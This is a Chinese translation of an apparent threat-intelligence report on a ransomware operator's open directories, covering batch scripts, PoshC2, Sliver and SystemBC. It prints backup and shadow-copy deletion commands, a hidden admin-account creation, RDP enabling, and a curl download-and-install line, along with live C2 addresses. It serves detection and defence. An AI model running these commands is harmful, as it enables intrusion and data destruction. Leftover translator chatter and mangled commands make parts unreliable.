划重点：

• • 2023年12月初，我们发现了一个存在目录浏览漏洞的互联网资产，里面充满了用于防御规避和执行命令的批处理脚本。这些脚本执行各种操作，包括禁用杀毒软件进程和停止与SQL、Hyper-V、安全工具和Exchange服务器相关的服务。
• • 本报告还记录了负责删除备份、清除事件日志和管理远程监控工具（如Atera）安装或删除的脚本。
• • 我们的调查包括Ngrok代理服务、SystemBC和两种知名的命令与控制框架：Sliver和PoshC2在内的其他工具的使用。
• • 根据该服务器日志推测攻击者长期使用，自2023年9月以来出现在DFIR报告情报源中。从那时起，它们一直断断续续地活跃，最近一次活动是在2024年8月检测到的。
• • 此报告新增了十条sigma规则，并添加到了我们的私有sigma规则集中。

摘要

在本报告中，我们深入探讨了一个存在目录浏览漏洞的互联网资产，该目录位于IP地址94.198.53.143，我们首次在2023年12月10日的情报收集过程中观察到。在开放目录出现之前，这个地址已经因为我们的威胁情报源中的PoshC2活动而受到关注。它首次出现在2023年9月21日，并且自那时以来一直断断续续地活跃，最近一次活动是在2024年8月11日，表明该基础设施被长期使用。

除了PoshC2，识别出的攻击者还使用了一系列批处理脚本和恶意软件来破坏Windows和Linux系统。他们的武器库包括如atera_del.bat和atera_del2.bat等脚本，用于删除Atera代理，backup.bat和delbackup.bat用于删除系统备份和卷影副本，以及clearlog.bat用于清理Windows事件日志和相关数据。

攻击者使用cmd.cmd来禁用用户账户控制并修改注册表设置，而像def1.bat和defendermalwar.bat这样的脚本则用于禁用Windows Defender、计划任务和卸载Malwarebytes。他们还使用了Ngrok等工具进行代理目的，使用Posh_v2_dropper_x64.exe进行基于PowerShell的命令与控制操作，以及包含SystemBC恶意软件的VmManagedSetup.exe。

攻击者进一步通过使用如disable.bat和hyp.bat等脚本停止和禁用各种关键服务，并使用LOGOFALL.bat和LOGOFALL1.bat注销用户会话来破坏系统。他们的主要目标似乎是系统破坏、数据销毁和逃避检测机制。

在我们的调查中，我们使用Shodan进行了追踪，并发现与端口443相关联的“PoshC2”名称。使用HTTP HTML哈希过滤器(http.html_hash:-1700067737)进一步探索，发现了第二个IP地址185.234.216.64:8000，其中包含与第一个IP地址发现的二进制文件非常相似的另一个开放目录。

在第二个开放目录185.234.216.64:8000中，我们发现了一个名为poshc2+user.txt的文本文件，内容是通过将‘WDAGUtilityAccount’错误地拼写为‘WDAGUtilltyAccount’来创建用户账户的过程。该脚本还包括使用电子邮件‘[email protected]’下载Atera代理的.MSI版本的说明。

尽管位于俄罗斯的94.198.53.143:8000的开放目录已被接管，包括DFIR报告在内的各种安全供应商依然标记这个IP为PoshC2活动。截至2024年8月11日，第二个IP地址185.234.216.64:8000仍然可以访问，表明攻击者继续使用此目录托管恶意批处理脚本和二进制文件，利用PoshC2和Sliver作为他们的主要远程控制武器。

与我们上次的报告相比，没有数据显示受害者或目标信息。然而，根据这些工具的用途，我们基本可以确定，这些服务器被用于勒索软件入侵活动——看到许多脚本试图杀死或停止服务，删除备份和卷影副本，并禁用或删除杀毒软件。

基于钻石模型的情报分析

攻击组织

在通过追踪技术发现的第二个开放目录中，我们观察到一个名为‘poshc2+user.txt’的文本文件。此文件详细描述了创建一个用户账户的过程，该账户伪装成默认的Windows账户‘WDAGUtilityAccount’，但多了一个‘l’，变成了‘WDAGUtilltyAccount’。脚本还包括使用[email protected]登录和使用curl来下载Atera代理的.MSI版本，这似乎是一个与Atera代理账户相关联的合法电子邮件地址。

基础设施

在分析托管开放目录的IP地址94.198.53.143时，我们发现它与PoshC2有关。使用VirusTotal等外部数据源拓线分析了几个线索，包括文件通信、下载、URLs，特别是命令与控制（C2）框架的集合。正如提供的截图所示，此IP地址与两个不同的C2框架相关联：‘PoshC2’和‘Sliver’。这两个命令与控制（C2）框架可以在GitHub上下载，通常用于渗透测试和红蓝对抗使用。然而，我们也观察到这两个开源工具正被攻击者使用。

• • Posh C2 – https://github.com/nettitude/PoshC2
• • Sliver – https://github.com/BishopFox/sliver

我们随后使用Shodan进一步深入研究开放目录IP（94.198.53.143），寻找有用的关联线索和额外信息。快速查看以下信息显示，此IP有多个开放端口：80、123、443、1337、8000、8443。

滚动开放端口列表时，我们注意到与端口443相关联的“PoshC2”名称。我们查看了http html哈希“http.html_hash:-1700067737”，并利用这个特征继续进行拓线。

搜索该http.html_hash后，我们发现了另一个IP 185.234.216.64。

这个IP（185.234.216.64）也位于俄罗斯莫斯科，有三个开放端口：123、443和8000。

查看开放端口时，我们观察到端口8000有一个HTTP状态码200，这暗示它可能仍然活跃且可访问。

通过进一步调查，我们发现了另一个活动的PoshC2开放目录，其中包含与最初PoshC2 IP上发现的几乎相同的批处理和可执行文件。这一发现是通过在Shodan中进行简单的追踪得出的。我们在2024年3月1日和2024年6月29日从这个新的开放目录（185.234.216.64:8000）检索文件。值得注意的是，最新的检索包含的文件比第一次多。然而，最有趣的部分是3月版本的开放目录中的‘poschc2+user.txt’文件，我们在攻击者删除之前成功监测到了它。

 

DFIR报告威胁情报

DFIR报告威胁情报团队一直在监控这些IP地址，因为它们涉及了我们的威胁源中的各种命令与控制框架。IP地址94.198.53.143首次于2023年9月21日被检测到，并自那时以来显示出间歇性活动。它主要与PoshC2和Sliver有关，有一个单一的实例链接到Empire。该基础设施使用不同的命令与控制框架是零星的，但它定期被重新激活，最近一次活动发生在2024年8月。

IP地址185.234.216.64专门与PoshC2活动有关。它从2023年10月到2024年8月一直间歇性地使用。

攻击组织技战术

这一节将介绍开放目录中不同的工具/脚本。下面是每个文件的简短摘要，然后我们将更详细地介绍。 atera_del.bat/atera_del2.bat

• • 这个批处理脚本用于删除Atera远程管理代理。

backup.bat

• • 这个批处理脚本用于删除所有系统状态和常规备份，删除所有卷影副本，并忽略所有启动失败。

clearlog.bat

• • 这个批处理脚本用于删除Windows事件日志，同时删除回收站和与终端服务器客户端相关的注册表键。

cmd.cmd

• • 这个文件用于禁用用户账户控制（UAC），修改注册表设置，包括远程桌面协议（RDP）设置。

def1.bat

• • 这个批处理脚本用于禁用Windows Defender和计划任务。

defendermalwar.bat

• • 这个批处理脚本用于禁用Windows Defender，修改用户账户控制设置，并卸载Malwarebytes。

delbackup.bat

• • 这个批处理脚本用于删除所有系统状态备份、备份目录、影子副本，并修改启动配置设置以忽略报错。

disable.bat

• • 这个批处理脚本用于停止和禁用与Microsoft SQL和Exchange、各种数据库服务以及Windows服务器/工作站上的其他系统服务相关的服务。

hyp.bat

• • 这个批处理脚本用于删除各种Hyper-V、SQL和Firebird服务器服务。它还停止了Windows机器中的广泛系统和第三方服务。

LOGOFALL.bat

• • 这个批处理脚本列出所有用户会话，并注销除第一个会话之外的每个会话。

LOGOFALL1.bat

• • 这个批处理脚本尝试注销所有会话，直到第20个会话，不包括用户当前的会话。

NG1.bat

• • 这个批处理脚本包含一个Ngrok认证令牌，运行在端口3389（RDP）。

NG2.bat

• • 这个批处理脚本包含一个Ngrok认证令牌，运行在同一个端口，3389（RDP）。

Ngrok.exe

• • 这是一个内网穿透代理工具。

ON.bat

• • 这个批处理脚本用于确保网络服务正在运行，并设置为自动启动。

Posh_v2_dropper_x64.exe

• • PoshC2下载器，一个基于PowerShell的C2可执行文件。

native_dropper

• • Posh_v2_dropper_x64.exe的Linux版本。

poshc2+user.txt

• • 包含PowerShell一行命令的文本文件，用于执行PoshC2代理并执行进一步的后渗透操作。

py_dropper.sh

• • 用于执行PoshC2的Python下载器的Bash shell脚本。

Setup_uncnow.msi

• • Atera远程管理工具安装程序。

shadow.bat/ shadowGuru.bat

• • 该批处理脚本包含多个与安全工具有关的注册表项删除操作，包括为多个磁盘驱动器创建网络共享，同时向所有人授予完全访问权限。

VmManagedSetup.exe

• • SystemBC恶意软件可执行文件。

WILD_PRIDE.exe

• • Sliver C2框架可执行文件。

z.bat

• • 这个批处理脚本用于删除与Hyper-V、多个防病毒程序、SQL和其他特定服务相关的服务和进程。

z1.bat

• • 这是一个庞大的脚本，用于自动化禁用进程、服务、注册表修改和许多防御规避技术。

atera_del.bat/atera_del2.bat

这个批处理文件的主要目标是移除并卸载Atera软件，包括与Atera代理安装相关的注册表键、服务和目录。在atera_del.bat中观察到的确切命令在许多公共资源中被看到，作为从系统中删除/卸载Atera的已知方法。

• • https://www.reddit.com/r/syncro/comments/pf85te/working_script_for_removing_atera_agent/
• • https://www.cliftonsystems.co.uk/atera-removal-script/
• • https://patrickdomingues.com/2022/01/19/how-to-uninstall-atera-agent-software/

第一条命令是使用msiexec通过静默方式卸载与给定产品代码关联的软件，在这种情况下，是专用于Atera的的产品代码。命令行参数“/x”用于卸载程序，而“/qn”表示以静默模式卸载Atera，不会向用户显示任何提示。timeout命令用于确保在执行卸载命令后有短暂的停顿（5秒），可能是为了允许Atera卸载过程正确完成，然后再继续批处理文件中的任何后续命令。sc命令用于停止然后完全删除AteraAgent服务，所有操作都在静默模式下完成，不会向用户显示任何输出，这得益于“> nul 2> nul”命令。taskkill命令用于终止特定进程，在这种情况下是TicketingTray.exe。TicketingTray.exe是AteraAgent软件的一部分，通常用于在系统上显示Atera图标。REG命令用于强制“f”删除与Atera Networks相关的注册表键。RMDIR命令静默且递归地删除当前用户本地临时文件中的“TrayIconCaching”目录。“/S”删除指定目录中的所有目录和文件以及目录本身，而“/Q”代表“静默模式”，不会提示确认。再次使用RMDIR命令删除“ATERA Networks”的安装文件夹，这些文件夹位于标准的“Program Files”和“Program Files (x86)”目录中。

backup.bat

这些命令旨在防止数据恢复，删除卷影副本，并配置系统启动设置，所有这些操作都使得恢复更加困难。

• • wbadmin 是一个Windows备份和恢复的命令行实用程序。DELETE SYSTEMSTATEBACKUP 参数用于删除系统状态备份。-keepVersions:0 标志指定不应保留系统状态备份的任何版本，基本上删除所有现有的系统状态备份。接下来，脚本再次运行 wbadmin。类似于之前的命令，这个命令用于删除常规备份（不仅仅是系统状态备份）。
• • mic 是另一个命令行实用程序，用于与Windows Management Instrumentation (WMI) 交互，它可以用于删除卷影副本。
• • vssadmin 命令用于删除指定卷的卷影副本。在这种情况下，它使用“/All”参数，该参数删除系统上的所有卷影副本。卷影副本是Windows用于备份和系统还原的。
• • cdedit.exe 随后用于通过修改启动配置数据来禁用Windows的自动恢复功能。

clearlog.bat

以下是对文章中关于clearlog.bat脚本部分的翻译：

clearlog.bat

这个批处理脚本检查用户是否具有管理员权限，并清除Windows中的事件日志。IT社区通常在多年前的多个IT论坛帖子中看到这些命令的部分使用。

• • https://answers.microsoft.com/en-us/windows/forum/all/clear-all-administrative-event-logs-in-event/17c5fba6-dc5e-4acd-9db0-e20665ce3ad5
• • https://www.get-itsolutions.com/commands-clean-recycle-bin/

让我们分解代码的每个阶段，并讨论它的功能。

• • @echo off 命令行隐藏了控制台本身的命令执行输出，同时使用 timeout /T 60 设置了60秒的计时器。
• • FOR /F "tokens=1,2*" %%V IN (‘bcdedit’) DO SET adminTest=%%V 是一个循环，它遍历 bcdedit 命令的输出，该命令显示启动配置数据，并搜索包含 "Access" 的行。
• • IF (%adminTest%)==(Access) goto noAdmin 这个条件语句检查 adminTest 变量是否等于 "Access"。如果是，执行跳转到 noAdmin 标签，有效地跳过清除日志的过程。

• • 这个命令有一个循环，它遍历 wevtutil.exe el 命令的输出，该命令列出事件日志，并对于每一行，调用 :do_clear 子程序，将行的内容作为参数。

• • echo clearing%1 打印一个消息，指示正在清除哪个事件日志。%1 占位符被实际传递的日志名称替换。
• • wevtutil.exe cl %1 清除由 %1 参数标识的特定事件日志。

• • 这行命令从系统分区中清除 $Recycle.bin 目录。

上面的命令用于删除主机工件上发现的远程桌面协议跟踪。在我们通常的分析中，这些是攻击者留下的工件，供我们作为他们横向移动的一部分识别与RDP相关的活动。

• • 这些命令尝试删除当前用户配置文件下与远程桌面设置相关的注册表键，其中使用了以下选项：
  • • /va: 删除与键相关联的所有值
  • • /f: 强制删除，即使键受保护

• • cd %userprofile%documents 这个命令将使用用户配置文件执行到文档文件夹的更改目录，其中通常存储 Default.rdp。Default.rdp 通常存储每个用户的RDP连接设置。由于 Default.rdp 是一个为每个用户存储的隐藏文件，需要运行 attrib Default.rdp -s -h（“-s” 从文件中移除“系统”属性，而 “-h” 移除“隐藏”属性）使其可见。一旦可见，命令 del Default.rdp 将执行文件的删除，作为攻击者删除RDP痕迹的一部分。

cmd.cmd

上述脚本通过其注释自我描述。该脚本旨在禁用用户账户控制（UAC），使用cmd.exe对粘滞键（Sticky Keys）、Utilman以及其他辅助功能进行后门处理，并禁用网络级身份验证（NLA）。运行此脚本将允许攻击者在无需认证的情况下访问Windows登录屏幕，并使用系统中的后门辅助工具在系统上下文中运行命令。

def1.bat

以下批处理脚本是另一个用于防御规避的脚本，提供了多个命令以禁用Windows Defender。

1. 1. 脚本的第一部分添加了十几个注册表键，以禁用Windows Defender的多个组件，包括实时保护、SpyNet和MpEngine。
2. 2. 脚本的第二部分尝试禁用与ETW跟踪和日志记录相关的注册表键。
3. 3. 第三部分禁用了与Windows Defender相关的多个计划任务。
4. 4. 第四部分的脚本致力于移除Windows Defender的多个GUI访问，特别是系统托盘图标和上下文菜单访问，例如按需扫描。
5. 5. 脚本的第五部分使用PowerShell将整个卷（C:, D:, E:, 和 F:）添加为Defender的排除路径。
6. 6. 最后一部分则设置注册表值以禁用多个Windows Defender服务。

defendermalwar.bat

这个批处理脚本执行多个命令，旨在禁用各种Windows Defender注册表键并更改用户账户控制设置。脚本的最后部分还使用WMIC命令卸载Malwarebytes。

上述命令用于修改Windows系统上与UAC相关的注册表键设置。让我们逐一分析这些命令：

• • PromptOnSecureDesktop，将此值设置为0，将禁用UAC提示出现的安全桌面。禁用此功能意味着UAC提示将出现在用户的当前桌面上，这可能不够安全，因为一些恶意软件可能与UAC提示交互或伪造UAC提示。
• • EnableLUA，将此值设置为1，启用有限用户账户（LUA）功能，这是UAC的基础技术。
• • ConsentPromptBehaviorAdmin，将其设置为0，修改了管理员用户UAC提示的行为。在此模式下，当执行需要管理员权限的操作时，UAC提示不会请求同意（或在标准用户账户上请求凭据）。

这些命令共同禁用了Windows Defender的多个安全设置，包括实时保护和行为监控。

这些PowerShell命令移除了Windows Defender功能，强制重启了Windows Defender服务，并强制重启了Windows防火墙服务。

命令的最后一部分包含wmic（Windows Management Instrumentation Commandline），用于静默卸载包含‘Malwarebytes’名称的任何产品。请注意，原文中的一些命令和参数在翻译时保持原样，以确保技术准确性和参考性。如果您有任何问题或需要进一步的翻译，请随时告诉我。

delbackup.bat

与另一个脚本（backup.bat）类似，delbackup.bat主要关注的是从Windows系统中删除备份和系统还原点，禁用恢复选项，并修改启动配置以忽略故障。它使用如wbadmin、wmic、vssadmin和bcdedit这样的命令行实用程序来删除现有的备份、影子副本和系统状态备份，然后更改系统的启动设置，以防止在发生错误时自动执行恢复操作。脚本的前七行重复了前面讨论的脚本中观察到的相同操作。

• • cmd.exe /C wbadmin STOP job: 停止当前正在运行的任何备份作业。
• • cmd.exe /C wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0 -quiet: 删除所有系统文件和设置的备份，不留任何副本。
• • cmd.exe /C wbadmin DELETE CATALOG -quiet: 移除所有备份的记录，使系统不再知道它们曾经存在过。
• • cmd.exe /C wbadmin DISABLE backup: 关闭备份计划，因此将不再制作更多的自动备份。
• • cmd.exe /C bcdedit /set {default} recoveryenabled No 和 cmd.exe /C bcdedit /set {default} bootstatuspolicy ignoreallfailures: 这些命令使计算机在启动时忽略错误，并停止尝试自动修复它们。

脚本的最后一部分自动化了在Windows系统上删除所有影子副本（备份快照）的操作，然后删除自身。首先，它将目录更改为包含脚本的目录，然后创建并执行一个通过diskshadow的命令序列来删除影子副本；最后，在用户输入暂停后，删除命令文件和脚本本身。

disable.bat

这个批处理脚本包含了398行代码，能够杀死进程并禁用多个服务，包括Web服务器、数据库和Exchange服务。使用的命令示例包括：

net stop MSExchangeDelivery
sc config MSExchangeDelivery start= disabled
net stop MSExchangeDiagnostics
sc config MSExchangeDiagnostics start= disabled
net stop MSExchangeEdgeSync
taskkill -f -im sqlbrowser.exe
taskkill -f -im sqlwriter.exe
taskkill -f -im sqlservr.exe
taskkill -f -im msmdsrv.exe
taskkill -f -im MsDtsSrvr.exe

该脚本还删除了许多防病毒服务，包括趋势科技（Trend Micro）、ESET和卡巴斯基（Kaspersky）：

值得注意的是，攻击者在脚本注释中多次错误地输入了"Delete"（Delite），这可能表明英语可能是该攻击者的第二语言。

该脚本的另一个功能是禁用和删除卷影副本（vssadmin.exe Delete Shadows /All /Quiet），这表明它旨在在勒索软件攻击中使用，以加速加密过程并防止受害者恢复文件。在我们的多份勒索软件报告中已经报告了类似的脚本。

hyp.bat

这个批处理脚本的名称表明它是与Hyper-V相关的工具。脚本有100多行，以以下命令开始，用于删除Hyper-V服务：

脚本还删除了与FireBird相关的两个服务：

Firebird是一个开源的SQL关系数据库系统，提供高性能、可扩展性和强大的功能。脚本的其余部分与我们在此报告中先前分析的文件重叠，禁用不同的数据库服务并杀死它们的进程。

 

 

LOGOFALL.bat

这个脚本是攻击者工具箱中最简短的脚本之一。它具有直接的功能：

查询会话命令查询系统上的当前会话，并将结果保存到文本文件中。然后，批处理脚本遍历文本文件，跳过第一行，并从第3个令牌（列）中提取会话ID。然后使用获得的会话ID注销会话，并删除文本文件。

LOGOFALL1.bat

这个脚本与LOGOFALL.bat类似，服务于相同的目标。这个增强版本仅注销未满足当前条件的用户或会话。

if /i “%%b”==”%username%” 检查第二个令牌（会话名称）是否等于当前用户名（%username%）。如果会话名称与当前用户匹配，则将会话ID（%%c）存储在变量curID中。

以下行：

for /L %%C in (0,1,20) do if “%%C” neq “%curID%” logoff %%C

启动一个for /L循环，该循环从0迭代到20。对于每个%%C的值，它检查该值是否不等于存储在%curID%中的当前会话ID。如果会话ID与当前会话ID不匹配，则使用ID为%%C的会话注销。

NG1.bat

这个批处理脚本包含三行ngrok配置：

ngrok config add-authtoken 命令将ngrok authtoken保存到配置文件中。而 ngrok tcp 可以用来启动一个TCP隧道，将公共端口上的所有流量转发到本地服务器（在本例中为RDP），并且也非常有用，可以暴露运行非HTTP流量的服务（SSH、SIP、RDP、RTSP、GRPC、游戏服务器等）。

NG2.bat

这个脚本与第一个ngrok脚本NG1.bat类似。只有认证令牌不同：

ngrok.exe

这个二进制文件是合法且签名的ngrok代理。

一些防病毒厂商将其标记为恶意软件，并归类为PUP（潜在不需要的程序）。如果您的环境中存在此二进制文件，并且您没有使用它，这可能是一个明显的入侵痕迹。

ON.bat

这种类型的命令被Blackbyte、Promethus和其他勒索软件集团用作其剧本的一部分，以对多个服务执行配置。除了使用net start命令启动多个服务外，以下是使用sc命令进行的配置更改：

sc.exe config Dnscache start= auto

• • 缓存DNS名称并为您的计算机注册完整的计算机名称。

sc.exe config SSDPSRV start= auto

• • 启用在家中网络上发现UPnP设备。

sc.exe config FDResPub start= auto

• • 发布您的计算机和附加到您的计算机的资源，以便它们可以在网络中被发现。

sc.exe config upnphost start= auto

• • 允许在您的计算机上托管UPnP设备。

参考链接 https://www.linkedin.com/pulse/english-blackbyte-ransomware-misterious-dropper-encoder-fasolo https://www.cybereason.com/blog/research/cybereason-vs.-prometheus-ransomware https://blog.talosintelligence.com/understanding-the-phobos-affiliate-structure

PoshC2以下是对文章中关于PoshC2部分的翻译：

PoshC2

PoshC2的Posh_v2_dropper_x64.exe是一个PoshC2投放器。具体来说，这个样本是一个C++ CLR（Common Language Runtime，也就是.NET）加载器，它执行了一个带有以下重建配置的PoshC2 PowerShell投放器。

{
  "ConnectURL": "/webhp/",
  "Key": "bX7WACSlpm2NpvJdQbRV8DHAjmEJpKWM8n4bkG6bzCI=",
  "KillDate": "2999-12-01",
  "URLID": 1,
  "PayloadCommsHost": "https://94.198.53.143",
  "StageRetriesLimit": 30,
  "StageRetries": true,
  "StageRetriesInitialWait": 60,
  "UserAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36"
}

使用默认的终止日期和TLS证书（除了所有其他工具和“地理”位置）是C2被敌对者使用而不是红队基础设施的常见迹象。在撰写本文时，Posh命令与控制服务仍在积极响应。可以通过默认的TLS证书设置来寻找额外的PoshC2基础设施。

native_dropper

native_dropper是PoshC2的Linux版本，对应于Windows版本的Posh_v2_dropper_x64.exe。通过检查此文件的哈希值（63229da1bed0c0eafc4ed087651af3eec521e7fbd098300f7d862582d03a675d），我们可以看到它现在被大多数防病毒供应商标记为恶意软件，评分为58/72。

快速的字符串分析揭示了这个PoshC2的配置。Packetwatch去年在他们的博客上也讨论过。

domain_front_hdr=94.198.53.143
server_clean=https://94.198.53.143
ua=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36
proxy_url=
proxy_user=
proxy_pass=
urls=webhp/
urls=adsense/troubleshooter/1631343/
urls=trader-update/history&pd=/
urls=status/995598521343541248/query=/
urls=uasclient/0.1.34/modules/
urls=utag/lbg/main/prod/utag.15.js/
urls=GoPro5/black/2018/
urls=usersync/tradedesk/
urls=bootstrap/3.1.1/bootstrap.min.js/
urls=TOS/
urls=business/home.asp&ved=/
urls=web/20110920084728/
urls=vssf/wppo/site/bgroup/visitor/
urls=Philips/v902/
urls=bh/sync/aol/
urls=async/newtab/
urls=advanced_search/
urls=adServingData/PROD/TMClient/6/8736/
urls=vfe01s/1/vsopts.js/
urls=cisben/marketq/
urls=business/retail-business/insurance.asp/
urls=client_204/
urls=branch-locator/search.asp/
urls=work/embedded/search/
urls=babel-polyfill/6.3.14/polyfill.min.js=/
urls=cdba/
urls=putil/2018/0/11/po.html/
urls=qqzddddd/2018/load.php/
urls=types/translation/v1/articles/
urls=classroom/sharewidget/widget_stable.html/
jitter=0.2
sleep_time=5
kill_date=32501019600

poshc2+user.txt

在我们使用Shodan进行追踪后观察到的第二个IP地址（185.234.216.64:8000）上的文件中，一个额外引起我们注意的是名为poshc2+user.txt的文本文件。让我们看看这个文本文件的内容。

该文本文件包含多个命令，我们将这些命令分为四个部分： 1: PowerShell 编码命令 以下是PowerShell解码后的命令。下面解码命令中提到的下载链接现在已经无法访问。

2: 创建用户账户 下面的命令用于创建一个用户名为“WDAGUtilltyAccount”的用户账户，密码为“Ujmqaz5055”。创建此账户后，它将被添加到本地管理员组。注意，这个用户尝试伪装成Windows中的常见系统账户“WDAGUtilityAccount”，只是在“i”的位置多打了一个“l”。

net user WDAGUtilltyAccount Ujmqaz5055 /add
net localgroup Administrators WDAGUtilltyAccount /add

3: 启用远程桌面协议 这些命令分为两部分。第一部分是注册表修改，用于通过将“fDenyTSConnections”的值设置为“0”来启用Windows机器上的远程桌面协议（RDP）。第二个命令通过打开TCP端口3389来配置Windows防火墙以允许传入的RDP连接。

reg add "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall add rule name="allow RemoteDesktop" dir=in protocol=TCP localport=3389 action=allow

4: 下载和安装Atera代理 提供的命令使用‘curl’下载Atera代理安装设置文件，指定必要的Gmail和账户ID。执行整个命令序列后，成功下载了‘setup.exe’文件，没有遇到任何问题。

curl -o setup.msi "https://HelpdeskSupport613811560.servicedesk.atera.com/GetAgent/Msi/?customerId=1&[email protected]&accountId=<redacted>" && msiexec /i setup.msi /qn /qn [email protected] CompanyId=1 AccountId=<redacted>

py_dropper.sh

这个脚本是一个编码的PoshC2 Python有效载荷投放器。

对base64编码的数据块进行解码后，得到的Python脚本如下：

这个脚本是配置版本的https://github.com/nettitude/PoshC2/blob/master/resources/payload-templates/dropper.py。对其进行解码后，我们获得了一些关于攻击者基础设施和方法的见解和IOCs（C2 IP、回调URL、UA）。这个样本中的设置配置与前面提到的样本中观察到的相同，表明它们是在同一个服务器构建期间生成的。请注意，原文中的一些命令和参数在翻译时保持原样，以确保技术准确性和参考性。如果您有任何问题或需要进一步的翻译，请随时告诉我。

setup_uncnow.mmsi

以下是对文章中关于setup_uncnow.msi部分的翻译：

setup_uncnow.msi

这个安装程序部署了Atera代理，它是远程监控和管理工具的一部分。这个工具通常被各种攻击者滥用来进行入侵。请注意，原文中可能指的文件名是setup_uncnow.msi，但在翻译中我使用了提供在URL中的文件名setup_uncnow.mmsi。这可能是一个笔误或特定情况下的文件扩展名。在没有额外上下文的情况下，我假设这是正确的文件名。

shadow.bat

与脚本名称所指示的相反，这个脚本不仅仅关注卷影副本。脚本使用两个命令vssadmin.exe Delete Shadows /All /Quiet和vssadmin delete shadows /all来删除系统上所有文件和文件夹的卷影副本。

脚本还通过禁用Windows Defender、启用远程桌面协议（RDP）以及通过将cmd.exe替换为辅助功能来对系统进行后门操作，执行多种防御规避技术，这些在之前的cmd.cmd脚本中已经看到过。

shadowGuru.bat

以下是对文章中关于shadowGuru.bat脚本部分的翻译：

shadowGuru.bat

这个脚本有两个主要功能。首先，它使用net share命令在网络上共享多个驱动器，允许所有人完全访问权限：

然后，它使用条件语句执行多项注册表清理和修改，这些与防病毒程序相关：

条件语句基于系统架构PROCESSOR_ARCHITECTURE检查，并相应地进行注册表修改。根据系统是32位还是64位，使用适当的路径（/reg:32或/reg:64）进行注册表更改。

请注意，原文中的一些命令和参数在翻译时保持原样，以确保技术准确性和参考性。如果您有任何问题或需要进一步的翻译，请随时告诉我。

VmManagedSetup.exe

VmManagedSetup.exe 可执行文件被识别为 SystemBC，这是一种恶意软件家族，已知其执行初始侦察并在选定目标上分发后续恶意软件。启动时，该恶意软件会立即持久化自身。

SystemBC 通过运行键持久化实现这一点。具体来说，它创建了 HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun 键，其值为 socks5，旨在通过 PowerShell 执行该样本。虽然这种方法远非隐蔽，但 SystemBC 已知会感染管理不善的企业设备，这些设备通常缺乏安全软件。

持久化建立后，SystemBC 启动其主线程。如下所示，SystemBC 首先启动一个单独的杀伤开关线程，本地监听以避免同时运行。然后，恶意软件定期信标，交替使用两个 C2。

为了逃避检测，SystemBC 确保其配置仅在建立 C2 连接时解密。恶意软件支持 IP 地址和主机名作为 C2 地址。

XOR 解码的配置暴露了两个 SystemBC 服务器为 94.198.55.181:4337 和 94.198.51.247:4337。

00000000  42 45 47 49 4e 44 41 54 41 48 4f 53 54 31 3a 39  |BEGINDATAHOST1:9|
00000010  34 2e 31 39 38 2e 35 35 2e 31 38 31 00 00 00 00  |4.198.55.181....|
00000020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000030  00 00 00 00 00 00 00 48 4f 53 54 32 3a 39 34 2e  |.......HOST2:94.|
00000040  31 39 38 2e 35 31 2e 32 34 37 00 00 00 00 00 00  |198.51.247......|
00000050  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000060  00 00 00 00 00 50 4f 52 54 31 3a 34 33 33 37 00  |.....PORT1:4337.|
00000070  00                                               |.|

由于 SystemBC 的主要功能是部署额外的恶意软件，其下载逻辑提供了额外的 IoCs。如下所述，VmManagedSetup.exe 可执行文件能够使用 HTTP/1.0 上的 GET 请求获取额外的有效载荷。所使用的用户代理为：

Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0

值得注意的是，下载功能依赖于默认的硬编码端口 INTERNET_DEFAULT_HTTP_PORT，这表明在端口 80 上使用普通的 HTTP 通信。这些类型的通信通常使组织能够通过网络设备检测可疑活动。

参考链接：

• • VirusTotal 上的 SystemBC 文件分析

请注意，原文中的一些命令和参数在翻译时保持原样，以确保技术准确性和参考性。如果您有任何问题或需要进一步的翻译，请随时告诉我。

WILD_PRIDE.exe

WILD_PRIDE.exe 可执行文件是一个Sliver植入器，Sliver是一个开源的对手“仿真”框架。由于Sliver框架是用Go语言编写的，并且使用garble进行混淆，依靠动态分析提供了识别C2的最容易的方法，对于这个样本来说，是94[.]198[.]53[.]143开放目录服务器。Sliver依赖于Protobuf来序列化命令和控制通信，幸运的是，这些不容易混淆。通过对项目Protobuf定义的字符串分析（识别protobuf/sliverpb/sliver.proto中的包含和排除变更），我们能够将植入版本缩小到可能是1.5.40或1.5.41，这两个版本是在2023年中期发布的，以解决CVE-2023-34758。

参考链接：

• • https://www.virustotal.com/gui/file/1aecadf489a6dd7a3a6e5dfda9425673a9d04d38a5cb6b0b8f961536c11237ed/detection
• • https://www.immersivelabs.com/blog/detecting-and-decrypting-sliver-c2-a-threat-hunters-guide/

z.bat

这个脚本包含242行代码，主要执行删除服务的操作。这些服务被分为不同的类别，包括不同的防病毒软件供应商、Hyper-V和SQL，如下所示：

rem Delite Service "Hyper-V"
rem Delite Service "AVG"
rem Delite Service "Malwaresbytes"
rem Delite Service "Sofos"
rem Delite Service "Fire_Bird"
rem Delite Service "SQL"
rem Delite Service "AV: Webroot"
rem Delite Service "AV: ESET"
rem Delite Service "AV: Kaspersky"
rem Delite Service "AV: Quick Heal"
rem Delite Service "AV: McAfee"
rem Delite Service "AV: Trend Micro"
rem Delite Service "AV: Panda"

除了删除服务外，它还执行杀死多个进程的操作：

rem Kill
rem Kill "AV: Trend Micro"
rem Kill "SQL"

这些命令用于检查特定防病毒或端点安全服务是否在Windows系统上运行。

1. 1. tasklist /fi "imagename eq MsMpEng.exe"：检查Windows Defender（MsMpEng.exe）的进程是否正在运行。
2. 2. | find /c "PID"：这部分过滤前一个命令的输出，计算包含“PID”一词的行数（检查是否找到了进程）。
3. 3. && Echo Windows Defender：如果前一个命令找到了进程（意味着Windows Defender正在运行），这部分将显示“Windows Defender”。

对于其他几行，结构相同，但它们检查不同的进程：

• • MBCloudEA.exe & MBAMService.exe — Malwarebytes。
• • ntrtscan.exe — Trend Micro Security。
• • avp.exe — Kaspersky Endpoint Security。
• • WRSA.exe — Webroot。
• • egui.exe — ESET。
